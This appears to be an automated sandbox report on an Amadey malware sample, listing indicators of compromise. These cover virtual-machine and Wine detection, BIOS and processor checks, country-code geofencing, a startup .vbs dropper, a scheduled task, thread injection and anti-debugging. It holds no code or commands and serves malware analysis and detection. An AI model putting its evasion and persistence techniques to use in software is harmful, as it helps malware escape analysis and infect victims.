amadey | dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4

Virtualization/Sandbox Evasion

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

axplons.exedd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeaxplons.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	axplons.exe

Drops startup file 1 IoCs

Processes:

Kaxhwswfup.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs Kaxhwswfup.exe
Executes dropped EXE 6 IoCs

Processes:

axplons.exeKaxhwswfup.exeaxplons.exe$77354151$77af6dbdaxplons.exe

pid process

4292 axplons.exe
2856 Kaxhwswfup.exe
4720 axplons.exe
4784 $77354151
648 $77af6dbd
3880 axplons.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	Kaxhwswfup.exe

pid	process
4292	axplons.exe
2856	Kaxhwswfup.exe
4720	axplons.exe
4784	$77354151
648	$77af6dbd
3880	axplons.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

axplons.exeaxplons.exedd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	axplons.exe

Drops file in System32 directory 8 IoCs

Processes:

svchost.exesvchost.exeOfficeClickToRun.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeaxplons.exeaxplons.exe

pid process

2156 dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
4292 axplons.exe
4720 axplons.exe
3880 axplons.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Kaxhwswfup.exepowershell.EXE

description	pid	process	target process
PID 2856 set thread context of 4784	2856	Kaxhwswfup.exe	$77354151
PID 4084 set thread context of 4820	4084	powershell.EXE	dllhost.exe
PID 2856 set thread context of 648	2856	Kaxhwswfup.exe	$77af6dbd

Drops file in Windows directory 2 IoCs

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeWerFault.exe

description	ioc	process
File created	C:\Windows\Tasks\axplons.job	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3212 648 WerFault.exe $77af6dbd

pid	pid_target	process	target process
3212	648	WerFault.exe	$77af6dbd

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

mousocoreworker.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

mousocoreworker.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe

Modifies data under HKEY_USERS 55 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={71141597-B88E-48A4-AD76-13AD089071B0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 23:34:03 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715729642"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c = 664b073957a6da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f4d4073957a6da01f4d4073957a6da01f4d4073957a6da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5846bc2000373939386434623438653766636533376565333664363862663062346438646631363831643562616361393530633662663138313865633633393037646463360000b20009000400efbeae5846bcae5846bc2e000000000000000000000000000000000000000000000000000c1d9800370039003900380064003400620034003800650037006600630065003300370065006500330036006400360038006200660030006200340064003800640066003100360038003100640035006200610063006100390035003000630036006200660031003800310038006500630036003300390030003700640064006300360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000cac0217e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37393938643462343865376663653337656533366436386266306234643864663136383164356261636139353063366266313831386563363339303764646336000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0e84f0e3dcd03ef118fd7f24b122c28858e69c4ea1508f64e82bc7922d9c9b2b0e84f0e3dcd03ef118fd7f24b122c2885d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\48bc7b06ea8322cd6af81d6a4508f3373b9b8b813bc998d6a224ceabe13c9f9a"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bbf80a94-1643-4b45 = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = 898fb33957a6da01	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3b762e73-b0bd-4ea6	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687 = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5b9a1e40-892d-4bfe	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = 14630c3957a6da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7998d4b48e7fce37ee36d68bf0b4d8df1681d5baca950c6bf1818ec63907ddc6"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85b342c9-489a-45ce = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bbf80a94-1643-4b45 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687 = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7998d4b48e7fce37ee36d68bf0b4d8df1681d5baca950c6bf1818ec63907ddc6"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e11eeeb7-8ced-457a = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = e5cccf3957a6da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
